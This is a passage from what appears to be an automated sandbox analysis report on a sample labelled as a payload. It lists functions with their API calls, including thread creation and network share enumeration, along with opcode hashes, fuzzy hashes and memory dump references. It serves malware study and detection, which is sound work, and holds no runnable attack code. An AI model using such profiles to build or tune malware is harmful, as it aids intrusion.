                                                                                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2443081362-0
                                                                                                                                                                        • Opcode ID: b84e9d67b229e477b8aaed5dfde3a630a71fbb14a95e26a049c6130ececd8c0f
                                                                                                                                                                        • Instruction ID: 166fb3c74ff0a65c0dab183037262a86a5833e96e193cb90deb6f18f576fa995
                                                                                                                                                                        • Opcode Fuzzy Hash: b84e9d67b229e477b8aaed5dfde3a630a71fbb14a95e26a049c6130ececd8c0f
                                                                                                                                                                        • Instruction Fuzzy Hash: E8E08636A046049BC720CB9CED8079DB3B4FB85721F240369D819732D047356D018944
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA6950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA69DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        • Opcode ID: b8144f4246d55bae4bc6a3ed1d4d5fc028d67bdfa9da13301e8aa1d05d3e9605
                                                                                                                                                                        • Instruction ID: a6f5e26af56f6caeb221f2267d0bee6dc110df5e9e093fa7f1c9a1b0e3d18d6f
                                                                                                                                                                        • Opcode Fuzzy Hash: b8144f4246d55bae4bc6a3ed1d4d5fc028d67bdfa9da13301e8aa1d05d3e9605
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E31B4B1A046059BCB24DF68C88166EB7F9EB4A710F24467DE456D7740DB309D048BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA6760 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA67E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        • Opcode ID: ea40b6d0f18e231b68f2e593d916ca93137d80f19d6d9b73c943835dca20904d
                                                                                                                                                                        • Instruction ID: 19175332b47c26e34364489e3841596f514edff5939ccfb473401bc6a85c6943
                                                                                                                                                                        • Opcode Fuzzy Hash: ea40b6d0f18e231b68f2e593d916ca93137d80f19d6d9b73c943835dca20904d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C3101F59046019BDB24CF28C88066EBBE8EB42760F1406AEE82697780D7749E04C7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA6570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA65C5
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        • Opcode ID: 6e7fe47e3e66a67975bbf2d5353746cc52dcaa4f60aeb6d2e6534de98cfcca4d
                                                                                                                                                                        • Instruction ID: 530d7d964f1bce4ae13d9f66de99041ed93d71a3c9d7c5c77802f8b8ebcee251
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e7fe47e3e66a67975bbf2d5353746cc52dcaa4f60aeb6d2e6534de98cfcca4d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C21F7B5900115DBCB14DF5CC981BAABFE9EF45B10F088269E8059F348E730E914CBE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2840 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA3C40: _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 00BA28AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2800726579-0
                                                                                                                                                                        • Opcode ID: 2c1cf10a720f8f7d0735abf3bf0e0a535976d413304b44361cdabd46424ce465
                                                                                                                                                                        • Instruction ID: 968cfc18a6fcffce0be8700f13a4ae6c2dfab6ddcc757d85f1f014a91765ffdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c1cf10a720f8f7d0735abf3bf0e0a535976d413304b44361cdabd46424ce465
                                                                                                                                                                        • Instruction Fuzzy Hash: E5110331900215ABDB109F49CC41BDFBBE8EF02714F000269FC14672C0C7B9AA198BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BACC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BACC83
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        • Opcode ID: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                                                                        • Instruction ID: 688e6031b35b5a6cbb913ebceb766b318d39fd45c484ff4daf71c151d211e621
                                                                                                                                                                        • Opcode Fuzzy Hash: de2def72106617bd751837f4368c798c607475e2aba36bab134435c0d11de50f
                                                                                                                                                                        • Instruction Fuzzy Hash: 94E086357082059BDB18DE12C451A7A7BD5DF93BA0B2480BDAC0E8B751FA30D904D7E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00BAFA25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: 85f7f1c3e2bef22039736c027591e974c473bbb4d8cce32a132417dfec5917d4
                                                                                                                                                                        • Instruction ID: dad82621533c4bbe90f1fde5efdfbae29baee171cdc1bcb2571da887bc4f704f
                                                                                                                                                                        • Opcode Fuzzy Hash: 85f7f1c3e2bef22039736c027591e974c473bbb4d8cce32a132417dfec5917d4
                                                                                                                                                                        • Instruction Fuzzy Hash: CAD0A7323483157BE7140A99AC07FDB7ACCCF15B10F00403AB609EA1C0D5E1F8108698
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA0BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00BA0C12
                                                                                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00BAFDA4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1835186980-0
                                                                                                                                                                        • Opcode ID: 9394563ef58f0b4d880cfebef972ae232fd53b0cc53b53c21df6773ceeef2b8b
                                                                                                                                                                        • Instruction ID: 3e3e8047d8366f2e909fdd08bf9de6576972f7a2c1ba2931fc541391d96295f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9394563ef58f0b4d880cfebef972ae232fd53b0cc53b53c21df6773ceeef2b8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 53E0C2311043046AD3209764CC01B86BBC49F19724F00C819E28A6B981C5A1B00486A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00CB9230), ref: 00BAFDD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: 14c0f4e45492ea2745eaf15de6a77d66284464c75ad4ffc1e1e21a84a719c4fa
                                                                                                                                                                        • Instruction ID: b397771f723e64311d0bd019da4c21f3a9d889c1a590afcd98812ebf83ff5ad5
                                                                                                                                                                        • Opcode Fuzzy Hash: 14c0f4e45492ea2745eaf15de6a77d66284464c75ad4ffc1e1e21a84a719c4fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 75D0C97178D3067BEB090BA9AC47F9E3AD8D719B01F404135B705E91E0DAB1A4609A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB20B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction ID: 0d02b5997b48ce867caf1fc4c6dd5cb798e772651c05bdfbca719ad31e37a990
                                                                                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction Fuzzy Hash: E0B0927244020C77CF012E86EC02AA93B599B50760F448060FB0C18161E6B7E6649689
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB0FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wfsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction ID: ac7c84116f89d3da8396ad0250e60a4c0b422cc111cddd9408a4c8438f9ef032
                                                                                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction Fuzzy Hash: 21B0927244020C77CE012A86EC02A993B699B456A0F808060FB0C18161A6B3A6A09A89
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _doexit.LIBCMT ref: 00BB7F47
                                                                                                                                                                          • Part of subcall function 00BB7E0E: __lock.LIBCMT ref: 00BB7E1C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(00C97B08,0000001C,00BB7CFB,00000000,00000001,00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E5B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E6C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E85
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(-00000004,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E95
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E9B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7EB1
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7EBC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
